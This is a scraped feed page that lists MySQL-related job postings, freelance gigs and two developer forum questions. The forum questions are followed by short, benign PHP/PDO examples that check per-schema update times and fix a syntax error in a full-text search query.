From Core10 - Mon, 15 Oct 2018 05:46:19 GMT - View all Huntington, WV jobs
          Senior Software Engineer - KOHLS - Menomonee Falls, WI      Cache   Translate Page      
MongoDB, Cassandra, Couchbase, Oracle and/or MySQL. Company Overview At Kohl’s, we’re always looking ahead to creating the next great thing....
From Kohl's - Tue, 30 Oct 2018 20:55:02 GMT - View all Menomonee Falls, WI jobs
          Sr Database Administrator - KOHLS - Menomonee Falls, WI      Cache   Translate Page      
Golden Gate MySql 5.7 MongoDB. Sr Database Administrator POSITION OBJECTIVE Plans and executes the design, development, implementation, integration and support...
From Kohl's - Thu, 04 Oct 2018 23:09:17 GMT - View all Menomonee Falls, WI jobs
          Mid-Senior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page      
Database technologies like MySQL, Oracle, PostgreSQL, MongoDB. Mid-level Full Stack Web Developer....
From Education Analytics - Fri, 02 Nov 2018 23:31:08 GMT - View all Madison, WI jobs
          Summer Intern Developers - Back End - Avid Ratings - Madison, WI      Cache   Translate Page      
MySQL, MongoDB, Cassandra, Redis, etc…). The right candidate should cherish experimentation and exploration with new technologies, while at the same time...
From Avid Ratings - Fri, 05 Oct 2018 00:14:43 GMT - View all Madison, WI jobs
          mysql deadlock and saving data after a few hours      Cache   Translate Page      
Hello,
...
          import and export woocommerce products completely      Cache   Translate Page      
I want to import woo products from a website and export to another website. I tried some plugins, but not completed well. My product has custom fields by function and by ACF(Pro and Table). I'm using clever swatch plugin, so I need to make same setting for each product by export/import... (Budget: $30 - $250 USD, Jobs: MySQL, PHP, WooCommerce, WordPress)
           Last access of a DB in Mysql      Cache   Translate Page      

@kostastsirigos wrote:

I have “inherited” a collection of Mysql DBs (~900) and I would like to know which of them are actually being used. I looked around and I can find some commands like:

SELECT from_unixtime(UNIX_TIMESTAMP(MAX(UPDATE_TIME))) as last_update FROM information_schema.tables WHERE TABLE_SCHEMA='MY_DB' GROUP BY TABLE_SCHEMA;

but this does not really tell me if MY_DB is being accessed by some web service or users, right? It only informs about when it was last updated, unless I got it wrong. If so, is there a more accurate way to find out the last access of a DB?

Thank you!

Posts: 1

Participants: 1

Read full topic
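
For the record, the same information_schema check can be run across every schema at once with a short PHP/PDO loop like the sketch below (host and credentials are placeholders). Keep in mind that UPDATE_TIME only reflects writes, is not maintained by every storage engine, and for InnoDB is not persisted across a server restart, so an old or NULL value is a hint rather than proof that a database is unused; spotting actual reads by web services or users needs something like the general query log or an audit plugin instead.

<?php
// Sketch: report the most recent recorded write per schema (connection details are placeholders).
$pdo = new PDO('mysql:host=localhost;charset=utf8mb4', 'root', 'secret', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

$sql = "SELECT TABLE_SCHEMA, MAX(UPDATE_TIME) AS last_update
        FROM information_schema.tables
        WHERE TABLE_SCHEMA NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys')
        GROUP BY TABLE_SCHEMA
        ORDER BY last_update";

foreach ($pdo->query($sql) as $row) {
    // NULL means the engine recorded no update time, not that the database is unused.
    printf("%-40s %s\n", $row['TABLE_SCHEMA'], $row['last_update'] ?? 'no update time recorded');
}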


          How can I improve rand()...rand() too slow      Cache   Translate Page      

@aosworks wrote:

Good Day,

Am trying to improve rand() method in my Mysql syntax because rand() is too slow but am facing some issue with the right syntax to use… below is the sql

$sql= "SELECT artist_username,artist_bizname,artist_city,artist_state,artist_country,members_signup.profile_photo 
FROM artists INNER JOIN members_signup ON artists.artist_username = members_signup.user_name
WHERE artists_id >= (SELECT FLOOR( MAX(artists_id) * RAND()) FROM `artists` 
MATCH(artist_str) AGAINST(:phrase) OR
MATCH(artist_city) AGAINST(:phrase) OR
MATCH(artist_state) AGAINST(:phrase) OR
MATCH(artist_country) AGAINST(:phrase) OR
MATCH(artist_username) AGAINST(:phrase) 
)ORDER BY artists_id";
$s = $pdo->prepare($sql);
$s->bindValue(":phrase", $srhArtistVal);
$s->execute();

each time I get syntax error message

check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘MATCH() AGAINST(’) OR MATCH() AGAINST( at line 4 in

Posts: 3

Participants: 2

Read full topic
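
For what it's worth, the syntax error in the thread above appears to come from the subquery never being closed: after "FROM `artists`" the statement runs straight into the MATCH() conditions with no WHERE, and the closing parenthesis only appears after them. A sketch of the same query with the subquery closed and the full-text conditions attached with AND (untested against the poster's schema, and still using the random-offset trick from the post rather than ORDER BY RAND()) could look like this:

// Sketch only; $pdo and $srhArtistVal as in the original post.
$sql = "SELECT artist_username, artist_bizname, artist_city, artist_state, artist_country,
               members_signup.profile_photo
        FROM artists
        INNER JOIN members_signup ON artists.artist_username = members_signup.user_name
        WHERE artists_id >= (SELECT FLOOR(MAX(artists_id) * RAND()) FROM artists)
          AND (MATCH(artist_str) AGAINST(:phrase)
            OR MATCH(artist_city) AGAINST(:phrase)
            OR MATCH(artist_state) AGAINST(:phrase)
            OR MATCH(artist_country) AGAINST(:phrase)
            OR MATCH(artist_username) AGAINST(:phrase))
        ORDER BY artists_id";
$s = $pdo->prepare($sql);
$s->bindValue(":phrase", $srhArtistVal);
$s->execute();

Note that reusing the same :phrase placeholder several times only works with PDO's emulated prepares, which is the default for the MySQL driver; with native prepares each occurrence would need its own named parameter.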


          Full Stack JavaScript Developer      Cache   Translate Page      

Are you a JavaScript Developer looking for an exciting new challenge and the opportunity to learn more about cyber security?  Our client, a leading education provider in London, has an opening for an experienced developer to join their team and contribute to the building of a new application security toolkit and management system.  No previous experience in the area of cyber security is required.

Key duties:

  • Work with cutting edge technologies on a global platform
  • Contribute to the design and direction of the system and support a team of specialists
  • Work in Javascript ES6 with Node.js in the server and React in the client and running in the Cloud
  • Project will include system integration, data analysis and correlation, reporting, scalability and scheduled, distributed, tool execution

Experience / skills required:

  • Good knowledge of Javascript / ES6 including use of classes
  • Knowledge of Node.JS / Express
  • A creative approach to application development and a desire to learn about Cyber Security
  • Experience of object oriented development
  • In depth knowledge of SQL and CSS
  • Experience of SQL Server, PostgreSQL, MySQL would be useful
  • Other desirable knowledge includes: React, Python, Git, Agile/Scrum, Jira

For further information, please apply online or email a CV and salary expectations to kelliemillar@atwoodtate.co.uk

Contact:             Kellie Millar

Tel:                    0203 574 4430

Applications ASAP, please

Atwood Tate embraces diversity and seeks to promote the benefits of diversity in all of our business activities and to develop a business culture that reflects that belief.  We welcome applications from all members of society irrespective of age, disability, sex, sexual orientation, colour, race, nationality, ethnic or national origin, religion or belief.

Reference: 
7423
Company: 
Location (from list): 
London, UK
Employment type: 
Full-time, Permanent
Type: 
IT
Job sector: 
Academic, Educational
Required skills: 
Javascript
Application email: 
Salary description: 
Available on request

          MySQL maintenance scheduled      Cache   Translate Page      
MySQL for Webserve,Other
Maintenance
Wed 11/7/2018 3:42 PM EST

          PHP5 and MySQL Bible      Cache   Translate Page      
none
          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          Cloud Software Engineer - JP Morgan Chase - Seattle, WA      Cache   Translate Page      
Design and implement automated deployment strategies that scale with the business. Knowledge in relational and NoSQL databases like MySQL, SQLServer, Oracle and...
From JPMorgan Chase - Tue, 06 Nov 2018 12:32:42 GMT - View all Seattle, WA jobs
          Java SDET      Cache   Translate Page      
DC-Washington DC, job summary: Randstad Technologies is looking for an Automation Engineer to join our client in Washington, DC! Job Description: • Develop, maintain and execute automated tests in Java. • Test APIs, associated databases (MongoDB, Cassandra or MySQL), and output in JSON and XML file feeds. • Create automated test plans and test cases • Evaluate test results to determine adherence to requirements and confo
          [Freelancer] WooCommerce Back end developer      Cache   Translate Page      
From Freelancer // Will explain all details on the conversation. As we need someone who is familiar with WooCommerce tables. MySQL
          OroCommerce Customization      Cache   Translate Page      
I want to customize an OroCommerce cloud application store front end. It uses a Symfony application (PHP). (Budget: $30 - $250 USD, Jobs: CakePHP, HTML, MySQL, PHP, Software Architecture)
          Dashboard Project      Cache   Translate Page      
codeigniter api development google analytics api I am looking for a programmer who can help me finish a project. Below are the requirements: USA Hours - You must work USA hours. No exceptions. There is enough work right now that you will need to be available for 8 hours a day... (Budget: $8 - $15 USD, Jobs: Codeigniter, Javascript, MySQL, PHP, Software Architecture)
          Joe Ferguson: Adding MySQL 8 support to Laravel Homestead      Cache   Translate Page      

In a new post to his site Joe Ferguson has included a screencast showing how to add MySQL 8 support to Laravel Homestead for your local development.

My friend Beau Simensen has been doing awesome stuff building and streaming his work on astrocasts.com. He’s inspired me to start streaming again and last night I spent some time adding a feature to Laravel Homestead to add MySQL 8 as an option.

In the video Joe walks through the whole process including how Homestead is set up (via Vagrant) and all of the configuration changes you'll need to make to get MySQL 8 support up and running. The video runs about an hour and a half but it's a great resource if you're looking to use this latest version of MySQL in your application.


          Database consulting      Cache   Translate Page      
I need to understand the requirements for the business needs. Can you explain database design, the resources, and the concerns to a layperson? (Budget: $8 - $15 USD, Jobs: Database Administration, Database Development, Database Programming, MySQL, SQL)
          Portfolio In PDF & Email SMS Phase 2      Cache   Translate Page      
There are four pages which needs to be designed / built Admin for email SMS (Over the Phase 1 already built) Admin for Portfolio in PDF Front end page of PDF Front end Page of Email SMS (Over the Phase... (Budget: ₹12500 - ₹37500 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)

